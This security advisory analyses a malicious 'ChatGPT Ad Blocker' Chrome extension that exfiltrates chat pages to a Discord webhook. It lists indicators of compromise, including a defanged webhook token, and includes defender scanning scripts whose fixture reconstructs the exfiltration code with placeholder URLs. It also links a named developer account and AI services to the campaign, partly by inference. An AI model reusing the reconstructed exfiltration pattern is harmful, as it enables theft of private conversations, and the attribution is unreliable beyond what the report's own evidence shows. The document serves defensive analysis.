Browser extensions have long been marketed as tools to enhance productivity, privacy, and browsing convenience. However, the discovery of a malicious Chrome extension named “ChatGPT Ad Blocker” highlights how easily trust can be exploited in the modern AI-driven ecosystem. What appears to be a harmless utility designed to block ads is, in reality, a sophisticated data-harvesting mechanism targeting user conversations.
This report uncovers a concerning pattern of behavior tied to a Chrome Web Store extension associated with the GitHub account krittinkalra, also linked to platforms such as AI4ChatCo and Writecream. While positioned as a solution to block ads on ChatGPT, the extension’s true purpose is far more invasive—it systematically extracts user data and transmits it to an external server without consent.

A Disguised Entry Point: The Chrome Extension
The extension, published on February 10, 2026, under the ID:
ipmmidjikiklckbngllogmggoofbhjikgb
presents itself as a simple ad-blocking tool. However, its internal behavior reveals a different intent. Upon installation, it immediately triggers a background process using chrome.runtime.onInstalled. This process fetches a remote configuration file from:
https[:]//raw.githubusercontent[.]com/krittinkalra/chatgpt-ad-blocker/main/rules.json
The extension sets up a persistent alarm using chrome.alarms.create("fetchRules", {periodInMinutes: 60}), ensuring that it re-fetches this configuration every hour. By appending a timestamp parameter (?t=${Date.now()}), it bypasses caching entirely, allowing attackers to dynamically modify the extension’s behavior without requiring updates or user interaction.
The Real Payload: Silent Data Exfiltration
While marketed as an ad blocker, the extension does not actively block ads. Instead, it injects a script (content.js) into ChatGPT pages. This script listens for commands from another component (popup.js) and initiates data extraction when triggered.
The mechanism works as follows:
- The popup (popup.js) sends a request to the content script: chrome.tabs.sendMessage(tab.id, {action: "GET_SANITIZED_HTML"})
- The content script clones the entire DOM using document.body.cloneNode(true)
- It removes scripts, styles, and images but retains textual content and structure
- It selectively redacts only text longer than 150 characters
This approach ensures that most user prompts, conversation flows, and metadata remain intact while avoiding detection by simplistic filters. The resulting HTML snapshot effectively reconstructs the user’s ChatGPT session.
Data Delivery via Discord Webhook
Once the data is collected, it is packaged and transmitted through a hardcoded Discord webhook:
https[:]//discord[.]com/api/webhooks/1470672111038103553/zkuhZvXgJ1auAbCTASubhGNF-wB2iTKVnvnp_uh3mCE8unGTTZBx49B6ZQzrEupkwr_f
The exfiltration process includes:
- Creating a Blob from the HTML data
- Attaching it as page_dump.html
- Sending it via FormData to Discord
Each submission appears in a Discord channel with the message:
“New Ad Report Received”
The payload includes the full page structure, user prompts, timestamps, and UI metadata—effectively exposing private conversations in a readable format.
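As an added, defender-side illustration that is not the extension's code and not part of the original report: a small Node.js triage script that scans an unpacked extension's JavaScript files for the behaviours described in the three sections above (runtime fetch of rules.json with a cache-busting timestamp, hourly chrome.alarms re-fetch, whole-DOM cloning, and Blob/FormData upload to a hardcoded Discord webhook). The sample files embedded in it are constructed from the report's description; the repository path and webhook in them are placeholders, not the real IoCs.

```javascript
// Added example: static triage of an unpacked extension's JavaScript files for
// the behaviours this report describes. Not the extension's own code; the
// SAMPLE_FILES fixture below is constructed from the report's description and
// uses placeholder URLs, not the real IoCs.

const RULES = [
  {
    id: 'discord-webhook',
    severity: 'high',
    desc: 'hardcoded Discord webhook URL (out-of-band delivery channel)',
    test: (src) => /discord(?:app)?\.com\/api\/webhooks\/\d+\/[\w-]+/.test(src),
  },
  {
    id: 'remote-config',
    severity: 'medium',
    desc: 'runtime fetch of configuration from raw.githubusercontent.com',
    test: (src) => /raw\.githubusercontent\.com\//.test(src) && /\bfetch\s*\(/.test(src),
  },
  {
    id: 'cache-busting',
    severity: 'low',
    desc: 'timestamp query parameter on a remote URL (defeats caching, allows live retasking)',
    test: (src) => /[?&]t=\$\{\s*Date\.now\(\)\s*\}/.test(src),
  },
  {
    id: 'periodic-alarm',
    severity: 'low',
    desc: 'periodic chrome.alarms job keeps the background re-fetch alive',
    test: (src) => /chrome\.alarms\.create\s*\([^)]*periodInMinutes/.test(src),
  },
  {
    id: 'dom-dump',
    severity: 'high',
    desc: 'clones the whole document body and serialises it to HTML',
    test: (src) => /document\.body\.cloneNode\s*\(\s*true\s*\)/.test(src) && /\b(?:outer|inner)HTML\b/.test(src),
  },
  {
    id: 'multipart-upload',
    severity: 'medium',
    desc: 'wraps captured data in a Blob and posts it as multipart FormData',
    test: (src) => /new\s+Blob\s*\(/.test(src) && /new\s+FormData\s*\(/.test(src),
  },
];

// Constructed fixture mirroring the report's description (placeholder URLs).
const SAMPLE_FILES = {
  'background.js': [
    'chrome.runtime.onInstalled.addListener(() => {',
    '  chrome.alarms.create("fetchRules", { periodInMinutes: 60 });',
    '});',
    'async function fetchRules() {',
    '  const url = `https://raw.githubusercontent.com/EXAMPLE_USER/EXAMPLE_REPO/main/rules.json?t=${Date.now()}`;',
    '  const res = await fetch(url);',
    '  chrome.storage.local.set({ rules: await res.json() });',
    '}',
  ].join('\n'),
  'content.js': [
    'chrome.runtime.onMessage.addListener((msg, sender, reply) => {',
    '  if (msg.action !== "GET_SANITIZED_HTML") return;',
    '  const clone = document.body.cloneNode(true);',
    '  clone.querySelectorAll("script, style, img").forEach((n) => n.remove());',
    '  reply({ html: clone.outerHTML });',
    '});',
  ].join('\n'),
  'popup.js': [
    'const WEBHOOK = "https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN";',
    'function deliver(html) {',
    '  const form = new FormData();',
    '  form.append("file", new Blob([html], { type: "text/html" }), "page_dump.html");',
    '  return fetch(WEBHOOK, { method: "POST", body: form });',
    '}',
  ].join('\n'),
};

// Run every rule over every file; one finding per (file, rule) hit.
function scanExtensionSource(files) {
  const findings = [];
  for (const [file, src] of Object.entries(files)) {
    for (const rule of RULES) {
      if (rule.test(src)) {
        findings.push({ file, id: rule.id, severity: rule.severity, desc: rule.desc });
      }
    }
  }
  return findings;
}

// Exfiltration needs both a capture primitive and a delivery channel; either
// alone only merits a closer look.
function verdict(findings) {
  const ids = new Set(findings.map((f) => f.id));
  const capture = ids.has('dom-dump');
  const delivery = ids.has('discord-webhook') || ids.has('multipart-upload');
  if (capture && delivery) return 'likely-exfiltration';
  if (findings.some((f) => f.severity === 'high')) return 'suspicious';
  return findings.length > 0 ? 'review' : 'clean';
}

const sampleFindings = scanExtensionSource(SAMPLE_FILES);
for (const f of sampleFindings) console.log(`[${f.severity}] ${f.file}: ${f.id} - ${f.desc}`);
console.log('verdict:', verdict(sampleFindings));
```

For a real audit, read the files of an unpacked extension (Chrome keeps installed extensions under its profile directory, for example ~/.config/google-chrome/Default/Extensions/<id>/<version>/ on Linux) into the same { filename: source } shape and pass them to scanExtensionSource. Signature matching is brittle by nature: minified or obfuscated code will slip past it, so a clean result means only that these specific patterns are absent, not that the extension is safe.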
Suspicious Developer Activity
The GitHub account associated with this extension shows unusual behavioral patterns:
- Account age: ~12 years (created ~2014)
- Previous work: Android kernel development (C/C++)
- Dormancy: Over 5 years (2020–2026)
- Sudden shift: Transition to JavaScript-based browser extensions
This abrupt pivot from low-level systems programming to web-based scripting, combined with the malicious nature of the extension, raises legitimate concerns. The same persona has publicly linked themselves to AI-driven platforms like AI4ChatCo and Writecream—services that claim to provide content generation and automation for millions of users.
Indicators of Compromise (IOCs)
The investigation identified the following domains associated with the campaign:
- blockaiads[.]com
- openadblock[.]com
- gptadblock[.]com
These domains may serve as infrastructure for distributing or supporting similar malicious tools.
Why This Attack Matters
This case is particularly alarming because it targets high-value conversational data. ChatGPT users often share sensitive information, including business ideas, personal thoughts, proprietary code, and confidential communications. By extracting structured HTML rather than raw text, the attacker preserves context, making the stolen data far more valuable.
The attack also demonstrates a broader trend: leveraging popular AI tools and policy changes—such as the introduction of ads—to socially engineer users into installing malicious software.
Security Recommendations
Users should adopt a cautious approach when installing browser extensions:
- Avoid extensions that promise to modify behavior on sensitive platforms
- Scrutinize permissions, especially access to “all websites”
- Be wary of tools linked to external or unknown developer ecosystems
- Regularly audit installed extensions and remove unused ones
Additionally, organizations should educate users about the risks of browser-based data exfiltration and enforce stricter endpoint security policies.
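An added defender-side example, not part of the original report: a Node.js script that audits an extension's manifest.json against the recommendations above (all-sites access, powerful permissions, content scripts injected into sensitive sites, and the alarms permission that enables recurring background work). The manifest it checks is constructed to resemble what the report describes, and the sensitive-host list is an assumed reviewer policy; neither comes from the extension itself.

```javascript
// Added example: audit an extension's manifest.json for the permission patterns
// the recommendations warn about. SAMPLE_MANIFEST is constructed, not the real
// extension's manifest; SENSITIVE_HOSTS is an assumed reviewer policy list.

const ALL_SITES = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);
const SENSITIVE_HOSTS = ['chatgpt.com', 'chat.openai.com'];
// Permissions that give an extension reach well beyond a single page.
const POWERFUL_PERMS = new Set(['tabs', 'scripting', 'webRequest', 'cookies', 'history', 'debugger', 'clipboardRead']);

// Extract the host part of a Chrome match pattern, or null if it has none.
function hostOf(pattern) {
  const m = /^(?:\*|https?|ftp|file):\/\/([^/]+)\//.exec(pattern);
  return m ? m[1] : null;
}

// Does this match pattern reach one of the sensitive hosts (including via a
// leading "*." wildcard)?
function coversSensitiveHost(pattern) {
  if (ALL_SITES.has(pattern)) return true;
  const host = hostOf(pattern);
  if (host === null) return false;
  if (host === '*') return true;
  return SENSITIVE_HOSTS.some((h) => {
    if (host.startsWith('*.')) {
      const suffix = host.slice(1); // e.g. ".openai.com"
      return h === host.slice(2) || h.endsWith(suffix);
    }
    return h === host;
  });
}

function auditManifest(manifest) {
  const findings = [];
  const perms = manifest.permissions || [];
  for (const p of perms) {
    if (ALL_SITES.has(p)) findings.push({ level: 'high', what: `permission ${p}: access to all websites` });
    else if (POWERFUL_PERMS.has(p)) findings.push({ level: 'medium', what: `powerful permission ${p}` });
  }
  for (const h of manifest.host_permissions || []) {
    if (ALL_SITES.has(h)) findings.push({ level: 'high', what: `host permission ${h}: access to all websites` });
    else if (coversSensitiveHost(h)) findings.push({ level: 'medium', what: `host permission on sensitive site ${h}` });
  }
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      if (coversSensitiveHost(m)) {
        findings.push({ level: 'high', what: `content script ${(cs.js || []).join(',')} injected into ${m}` });
      }
    }
  }
  if (perms.includes('alarms')) {
    findings.push({ level: 'low', what: 'alarms: can schedule recurring background work (e.g. re-fetching remote rules)' });
  }
  return findings;
}

// Overall level is the worst finding present.
function riskLevel(findings) {
  if (findings.some((f) => f.level === 'high')) return 'high';
  if (findings.some((f) => f.level === 'medium')) return 'medium';
  return findings.length > 0 ? 'low' : 'none';
}

// Constructed manifest resembling what the report describes (not the real one).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'ChatGPT Ad Blocker (constructed sample)',
  version: '1.0',
  permissions: ['alarms', 'storage', 'activeTab'],
  host_permissions: ['https://chatgpt.com/*'],
  background: { service_worker: 'background.js' },
  content_scripts: [{ matches: ['https://chatgpt.com/*', 'https://chat.openai.com/*'], js: ['content.js'] }],
  action: { default_popup: 'popup.html' },
};

const sampleAudit = auditManifest(SAMPLE_MANIFEST);
for (const f of sampleAudit) console.log(`[${f.level}] ${f.what}`);
console.log('risk level:', riskLevel(sampleAudit));
```

To check a real extension, load its manifest with JSON.parse(fs.readFileSync(path)) and pass the object to auditManifest. The permissions granted at install time are what to weigh: an ad blocker that claims to act on one site has no reason to ask for all-sites access, and a content script on a platform that carries confidential conversations is exactly the entry point this report describes.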
Our Perspective on This Incident
This case reflects a deeper issue within the modern AI and browser ecosystem: the growing intersection of convenience, trust, and exploitation. The attacker did not rely on sophisticated zero-day vulnerabilities or advanced exploits. Instead, they leveraged user psychology—offering a solution to a perceived annoyance (ads)—to gain access to highly sensitive data.
What stands out is the calculated design of the extension. From dynamic rule fetching to selective data sanitization, every component appears engineered to maximize stealth and adaptability. The use of Discord as an exfiltration channel further demonstrates how attackers are increasingly relying on legitimate platforms to mask malicious activity.
Equally concerning is the potential ecosystem risk. If the same developer is associated with widely used AI services, the question of broader data exposure becomes unavoidable. While no direct evidence confirms compromise in those platforms, the overlap in identity warrants scrutiny.
Ultimately, this incident underscores the need for stronger vetting mechanisms in browser extension marketplaces and greater awareness among users. As AI tools become more embedded in daily workflows, they will inevitably become more attractive targets. Trust, once broken in such environments, is difficult to restore—and that makes proactive security more critical than ever.
